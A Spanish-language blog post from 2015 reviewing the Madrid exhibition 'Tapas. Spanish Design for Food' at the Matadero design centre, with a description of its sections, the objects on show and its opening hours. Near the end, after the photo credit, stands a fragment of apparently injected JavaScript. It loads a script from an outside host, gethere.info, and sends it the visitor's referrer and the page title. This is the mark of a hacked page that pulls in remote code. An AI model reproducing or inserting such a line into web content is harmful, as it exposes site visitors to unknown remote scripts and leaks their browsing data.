Tapas. Spanish Design for Food

24/06/2015

Salero

Este es el título de una de las exposiciones que la capital española nos ofrece hasta el próximo mes de julio. Desde el pasado mes de mayo, podéis disfrutarla en la Central de Diseño (Matadero) del Paseo de la Chopera -un espacio único e idóneo para una muestra de este calibre-. Está organizada por la Acción Cultural Española (AC/E) lo que asegura unos excelentes resultados tanto de contenidos como organizativos.

¿Con qué os encontraréis? Pues con una exposición que pretende fundamentalmente destacar la inevitable unión de la gastronomía con el diseño. Para trasladar al visitante esta idea han dividido la muestra en cuatro secciones: cocina, mesa, comida y vinos. Y así, a lo largo de estas secciones, y, con el apoyo de más de 200 objetos (objetos tan básicos como un salero, o más elaborados, como una bodega española), entenderemos cómo la vanguardia, el arte, la ciencia, la innovación y la tradición han ayudado a solventar diversos aspectos de la alimentación.

España siempre ha defendido a capa y espada la conexión entre gastronomía y diseño, por lo que es un peso pesado en el asunto a nivel mundial. De hecho, una vez finalizado el recorrido de la muestra, al espectador le queda más que claro el gran papel que España ha desempeñado, y, desempeña, en la gastronomía global. La cultura española ha sabido solventar complicaciones en el tema en más de una ocasión. Además, puede presumir de contar con cocineros que han conseguido desarrollar sorprendentes técnicas de vanguardia, que han llegado a transformar las técnicas culinarias de prácticamente todos los rincones del mundo. Nuestro país es, sin duda alguna, un referente mundial gastronómicamente hablando.

Excepto los lunes, podréis disfrutar de la exposición cualquier tarde entre semana. O bien, sábados y domingos, desde las 11 de la mañana hasta las 10 de la noche ininterrumpidamente. No os defraudará: ni el espacio que la acoge, ni su pensadísima organización, ni sus excelentes contenidos… que además, se complementan con talleres, conferencias, encuentros y performances 🙂 .

Foto | Vacacion

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ETIQUETAS
ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO